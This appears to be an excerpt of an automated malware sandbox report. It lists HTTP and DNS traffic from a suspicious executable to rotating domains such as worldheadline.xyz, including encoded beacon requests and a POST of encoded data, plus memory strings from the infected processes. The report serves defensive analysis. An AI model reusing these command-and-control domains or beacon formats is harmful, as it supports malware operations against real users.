Source: global traffic	HTTP traffic detected: GET /t7vt/?JNx8tTw=uDGK8VjmNJjS9S78Zu3fjPk+qbPTeN8FCtxt9GSvaaiUOHuM2RHrw8XoT9PDXAl+CqF8gx2YQ/m+f5qIVb5xWNdhTtWiVvoVTDqmbClT5EaAJa6SCw+I3UYWCEeU2WlC1g==&F0a=DDvTXr_Hk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.worldheadline.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bk2c/?JNx8tTw=fyR/dS20qv8EXSd8u+Bcgvv3xf0q4er0Bfje+Rii9aayzDLrig5kNBZNNidIJWoLGG2wTsvUDg8b8pJZ+WjXr6oyts3SJgHwjkutIwVayIFFDsRDIWHfWbE9GGLqUV2/ag==&F0a=DDvTXr_Hk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.michaelstutorgroup.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /uum0/?F0a=DDvTXr_Hk&JNx8tTw=e8mLO0vfs8Y3qrjnXCuwWWFpxRqUwvXg5R5zTwg0dxPA0D0+2y5XZdX7Jiy5LTJObhiw6tiNBJ2tuOImZYLd7CSBsL3AjEU0bE2Rvh0Rs/xCr/kZro4Zx80LlhBtIK+G2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.yp78w.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ggr3/?JNx8tTw=+ulKtzjhC/pF9uoDIL96mS+Q2gVwjVfYnGC5dhxw+14/MHoXjYhMFpwJCtX2zxSL+1u8Kqx4aLSiOAPYuX8wC92mPQi5Iz3Ed95V/6CV65glQfCAW8c6AwGpbOMtcs+eTg==&F0a=DDvTXr_Hk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gzlxdj1921.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /gjm3/?JNx8tTw=PeXQ/0fKICzM5BJz6p9ArJpLN7UVrkFd1P+d/QKATQOsfeoG8d5Si8/kOzzLJ6xWOh7b+xseW4maj8a6yNy3oL5cFlzPj7mwU9Y3C34E4mLKEtfNI6H114erhWwp1eiAVA==&F0a=DDvTXr_Hk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kawambwa-sugar.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lxy9/?JNx8tTw=aMYCWBWby78cu2Pg5kxC7/s+ledqG+yLUHOKH+0jK4PAR/gCFqdm34ajEirZUZfXHWNx+XxCFLbhto71FEYU7CwGQbfx96/8sGe6uy0dOdRuFla+tLr5WY0xGsTDrvD3UQ==&F0a=DDvTXr_Hk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.counseloratlaw1806.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0190/?F0a=DDvTXr_Hk&JNx8tTw=Z6ERJFoDCUfQsIq8ofQDjrU1/9I1+MRHON9wFl6H5eE5mUn/k+ER1FqTfAe8nYNZ1iEuv5/EQNBLECXnnxN4D66rqY36fh1KhKiNJpoJ9uKwS3VDPLljB2Epzr3xCgB2gg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.by8991.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m0g5/?JNx8tTw=v+1eTQfXPK01THcu7pbmAS42DyzqlOtItb5Eb9c8KvL/A6xTgKiPVGfIIznZuhkLGgsCmT/+LFa4xDCCaumIevXLE/pBvbyNXBWM5DHRFsPfN4jorGf/PcFvNcFgYAm0gQ==&F0a=DDvTXr_Hk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.corbincodes.techConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.worldheadline.xyz
Source: global traffic	DNS traffic detected: DNS query: www.michaelstutorgroup.com
Source: global traffic	DNS traffic detected: DNS query: www.yp78w.top
Source: global traffic	DNS traffic detected: DNS query: www.gzlxdj1921.com
Source: global traffic	DNS traffic detected: DNS query: www.kawambwa-sugar.com
Source: global traffic	DNS traffic detected: DNS query: www.counseloratlaw1806.xyz
Source: global traffic	DNS traffic detected: DNS query: www.by8991.vip
Source: global traffic	DNS traffic detected: DNS query: www.corbincodes.tech

Source: unknown

HTTP traffic detected: POST /bk2c/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.michaelstutorgroup.comContent-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.michaelstutorgroup.comReferer: http://www.michaelstutorgroup.com/bk2c/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36Data Raw: 4a 4e 78 38 74 54 77 3d 53 77 35 66 65 6c 37 73 36 38 42 6b 56 53 35 50 2f 72 70 36 70 74 62 76 33 64 39 55 2f 76 47 54 57 70 58 46 2b 52 57 33 68 62 43 71 33 69 7a 5a 2f 67 56 54 50 79 78 5a 55 57 4e 7a 65 67 6f 73 43 47 79 41 65 50 76 6c 52 7a 56 4d 6b 5a 52 78 34 46 32 43 6f 4c 74 46 6b 76 66 75 4c 54 6e 72 6a 56 33 37 41 77 31 69 31 6f 39 69 59 71 6b 51 62 6a 36 52 64 4d 67 37 4c 56 37 61 57 53 54 4f 4d 56 34 54 31 66 58 57 73 38 6c 69 45 53 4b 46 56 79 32 58 76 68 54 4c 4a 54 6a 61 6d 64 63 37 73 6c 2b 54 75 6e 77 2f 64 65 51 4e 36 41 2b 32 6d 63 44 68 63 4f 6d 41 72 59 57 2f 6c 63 72 66 76 68 61 46 77 38 55 3d Data Ascii: JNx8tTw=Sw5fel7s68BkVS5P/rp6ptbv3d9U/vGTWpXF+RW3hbCq3izZ/gVTPyxZUWNzegosCGyAePvlRzVMkZRx4F2CoLtFkvfuLTnrjV37Aw1i1o9iYqkQbj6RdMg7LV7aWSTOMV4T1fXWs8liESKFVy2XvhTLJTjamdc7sl+Tunw/deQN6A+2mcDhcOmArYW/lcrfvhaFw8U=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6679219a-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6679219a-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6679219a-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6679219a-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:39 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6679219a-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 31 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 72 94 40 10 be f3 14 2d 7b d1 03 bb 80 24 ae 84 70 f1 e7 a8 39 a4 b4 3c 36 4c b3 50 01 06 67 86 8d ab 65 55 ca 93 be 83 1e f4 e8 c9 8b 57 5f c6 32 55 79 0b 87 30 c9 2e bb 54 e2 c1 39 0c 4c 7f dd fd 35 5f 4f 13 dd 79 fc fc d1 f1 ab a3 27 90 ab aa 8c ad e8 ea 41 c8 62 0b f4 8a 2a 52 08 69 8e 42 92 3a b4 5b 95 39 73 1b 66 06 54 85 2a 29 7e c6 15 3c e5 6d cd e0 ee 24 70 83 7b d1 ac b7 5b bd 93 54 ab ee 00 66 25 9c ad e0 dd f5 b1 5b 19 af 55 08 35 17 15 96 f0 b0 51 60 bf 20 c1 b0 46 fb 60 e0 97 f2 92 8b 10 26 ae eb 0e 81 04 d3 93 85 e8 4a d0 68 96 65 6b f4 bd 75 fd 9a 7b 37 d1 7a f3 db 79 b3 6d de 0a c5 a2 a8 9d 84 2b c5 ab 10 a6 7b 54 8d 53 fb 37 52 07 b7 53 cf 5d 77 e7 ab ff 99 fd fe 28 7b c2 4b 06 9e 37 ce bd 11 de fc cf 6e 6d e4 9d 2e 49 c8 82 d7 5b e9 4d d8 42 e0 ea 60 87 d7 91 c5 5b 0a 41 f7 6a eb 02 70 c1 48 38 8a 37 21 78 cd 1b 90 bc 2c 18 4c 10 71 e8 d7 20 63 45 bd 30 8e 9b 7a 8d 08 ea 0d f5 ec f6 68 66 6e 73 34 eb 67 c4 8a ba fb 6c c6 21 f7 46 66 41 1b 0d ea c7 17 5f 7f 5e 7c f9 76 fe f9 fb f9 a7 5f 7f 3e fe f8 7d f6 41 e3 be c1 9b f5 8c 1c e7 04 98 f0 25 01 09 c1 05 f0 34 6d 85 20 06 a7 79 51 12 28 0d bf a4 04 24 09 ad 21 9c a2 84 46 f0 94 a4 d4 df 06 2b de 0a 10 f4 ba 25 a9 a6 a6 ea 66 97 e3 a8 24 94 a4 e5 ae 15 a6 0a 5a 09 45 d6 c5 ea ec 45 7d d2 ed da 22 01 af 58 2e 2b 99 ea d2 50 a3 da 6f 3b 35 2b 96 90 96 28 e5 a1 6d 1a 6b af c9 7c d7 0f 1c f7 81 e3 ef 83 b7 17 06 5e 18 ec f7 d1 3a 2a 1e f4 a0 37 f7 a2 6a 71 2e ff 47 9d ed 2f 94 ce d9 7f ab 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fcTr@-{$p9<6LPgeUW_2Uy0.T9L5_Oy'AbRiB:[9sfT)~<m$p{[Tf%[U5Q` F`&Jheku{7zym+{TS7RS]w({K7nm.I[MB`[AjpH87!x,Lq cE0zhfns4gl!FfA_^\|v_>}A%4m yQ($!F+%f$ZEE}"X.+Po;5+(mk\|^:*7jq.G/0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 31 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 72 94 40 10 be f3 14 2d 7b d1 03 bb 80 44 57 42 b8 f8 73 d4 1c 52 b1 3c 36 4c b3 50 01 06 67 86 8d ab 65 95 e5 49 df 41 0f f1 e8 c9 8b 57 5f c6 32 55 79 0b 87 30 c9 2e bb 54 e2 c1 39 0c 4c 7f dd fd 35 5f 4f 13 dd 79 f2 e2 f1 d1 ab c3 a7 90 ab aa 8c ad e8 ea 41 c8 62 0b f4 8a 2a 52 08 69 8e 42 92 3a b0 5b 95 39 73 1b 66 06 54 85 2a 29 7e ce 15 3c e3 6d cd e0 ee 24 70 83 7b d1 ac b7 5b bd 93 54 ab ee 00 66 25 9c ad e0 dd f5 b1 5b 19 af 55 08 35 17 15 96 f0 a8 51 60 1f 93 60 58 a3 bd 3f f0 4b 79 c9 45 08 13 d7 75 87 40 82 e9 c9 42 74 25 68 34 cb b2 35 fa de ba 7e cd bd 9b 68 bd f9 ed bc d9 36 6f 85 62 51 d4 4e c2 95 e2 55 08 d3 3d aa c6 a9 fd 1b a9 83 db a9 e7 ae bb f3 d5 ff cc 7e 7f 94 3d e1 25 03 cf 1b e7 de 08 6f fe 67 b7 36 f2 4e 97 24 64 c1 eb ad f4 26 6c 21 70 b5 bf c3 eb c8 e2 2d 85 a0 7b b5 75 01 b8 60 24 1c c5 9b 10 bc e6 0d 48 5e 16 0c 26 88 38 f4 6b 90 b1 a2 5e 18 c7 4d bd 46 04 f5 86 7a 76 7b 34 33 b7 39 9a f5 33 62 45 dd 7d 36 e3 90 7b 23 b3 a0 8d 06 f5 e3 8b b3 9f 17 5f bf 9d 7f f9 7e fe f9 d7 9f 4f 3f 7e 7f f8 a8 71 df e0 cd 7a 46 8e 72 02 4c f8 92 80 84 e0 02 78 9a b6 42 10 83 d3 bc 28 09 94 86 5f 52 02 92 84 d6 10 4e 51 42 23 78 4a 52 ea 6f 83 15 6f 05 08 7a dd 92 54 53 53 75 b3 cb 71 58 12 4a d2 72 d7 0a 53 05 ad 84 22 eb 62 75 f6 a2 3e e9 76 6d 91 80 57 2c 97 95 4c 75 69 a8 51 ed b7 9d 9a 15 4b 48 4b 94 f2 c0 36 8d b5 d7 64 be eb 07 8e fb d0 f1 1f 80 b7 17 06 5e 18 cc fb 68 1d 15 0f 7a d0 9b 7b 51 b5 38 97 ff a3 ce f6 17 fd c4 83 c4 ab 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fcTr@-{DWBsR<6LPgeIAW_2Uy0.T9L5_OyAbRiB:[9sfT)~<m$p{[Tf%[U5Q``X?KyEu@Bt%h45~h6obQNU=~=%og6N$d&l!p-{u`$H^&8k^MFzv{4393bE}6{#_~O?~qzFrLxB(_RNQB#xJRoozTSSuqXJrS"bu>vmW,LuiQKHK6d^hz{Q80
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 31 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 bd 72 d4 30 10 ee fd 14 8b af 81 c2 77 96 f1 c1 e1 38 6e f8 29 21 45 06 86 52 b6 d6 67 4d 6c cb 48 f2 85 83 61 86 a1 82 77 80 02 4a 2a 1a 5a 5e 86 21 33 79 0b e4 58 c9 9d ef 3c 09 05 2a 64 6b bf dd fd d6 df 6a 1d df 7a f4 ec e1 f1 cb a3 c7 50 e8 aa 4c 9c f8 f2 81 94 25 0e 98 15 57 a8 29 64 05 95 0a f5 a1 db ea dc 5b b8 30 b3 a0 e6 ba c4 e4 a9 d0 f0 44 b4 35 83 db 93 d0 0f ef c4 b3 de ee f4 4e 4a af bb 03 d8 95 0a b6 86 b7 57 c7 6e e5 a2 d6 11 d4 42 56 b4 84 07 8d 06 f7 39 4a 46 6b ea 1e 0c fc 32 51 0a 19 c1 c4 f7 fd 21 90 d2 ec 64 29 bb 12 0c 9a e7 f9 06 7d e7 5c bd 16 e4 3a 5a b2 b8 99 37 df e5 ad a8 5c f2 da 4b 85 d6 a2 8a 60 3a c7 6a 9c 3a b8 96 3a bc 99 7a e1 fb 7b 5f fd cf ec 77 47 d9 53 51 32 20 64 9c 7b 2b bc f9 9f dd da ca 3b 5d a1 54 5c d4 3b e9 6d d8 52 d2 f5 c1 1e af a7 f8 1b 8c c0 f4 6a e7 02 08 c9 50 7a 5a 34 11 90 e6 35 28 51 72 06 13 4a e9 d0 af a1 8c f1 7a 69 1d b7 f5 1a 11 94 0c f5 ec f6 78 66 6f 73 3c eb 67 c4 89 bb fb 6c c7 a1 20 23 b3 60 8c 16 0d 92 f3 af 3f cf bf 7c 3b fb fc fd ec d3 af 3f 1f 7f fc 7e ff c1 e0 81 c5 9b cd 8c 1c 17 08 34 15 2b 04 94 52 48 10 59 d6 4a 89 0c 4e 0b 5e 22 68 03 bf c0 14 14 4a a3 21 9c 52 05 8d 14 19 2a 65 be 0d d6 a2 95 20 f1 55 8b 4a 4f 6d d5 cd 3e c7 51 89 54 a1 91 bb d6 34 d3 d0 2a e0 79 17 6b b2 f3 fa a4 db 8d 45 01 bd 64 b9 a8 64 6a 4a a3 06 35 7e bb a9 19 5f 41 56 52 a5 0e 5d db 58 77 43 16 f8 41 e8 f9 f7 bd e0 1e 90 79 14 92 68 4e fa 68 13 95 0c 7a d0 9b 7b 51 8d 38 17 ff a3 ce f6 17 93 67 94 40 ab 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fcTr0w8n)!ERgMlHawJZ^!3yX<dkjzPL%W)d[0D5NJWnBV9JFk2Q!d)}\:Z7\K`:j::z{_wGSQ2 d{+;]T\;mRjPzZ45(QrJzixfos<gl #`?\|;?~4+RHYJN^"hJ!Re UJOm>QT4ykEddjJ5~_AVR]XwCAyhNhz{Q8g@0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jul 2024 07:41:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 34 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 38 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 33 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 62 6f 6c 64 20 31 31 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e e9 a1 b5 e9 9d a2 e6 9c aa e6 89 be e5 88 b0 e3 80 82 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20

Source: VnZdrTcLqvUA.exe, 00000008.00000002.3918414894.00000000006A8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.corbincodes.tech
Source: VnZdrTcLqvUA.exe, 00000008.00000002.3918414894.00000000006A8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.corbincodes.tech/m0g5/
Source: attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.worldheadline.xyz.
Source: attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.worldheadline.xyz/index.php
Source: attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.worldheadline.xyz/index.php?page=categories
Source: attrib.exe, 00000005.00000002.3919772809.0000000003914000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3921714833.0000000005F00000.00000004.00000800.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000029A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.0000000039664000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.worldheadline.xyz/index.php?page=contact
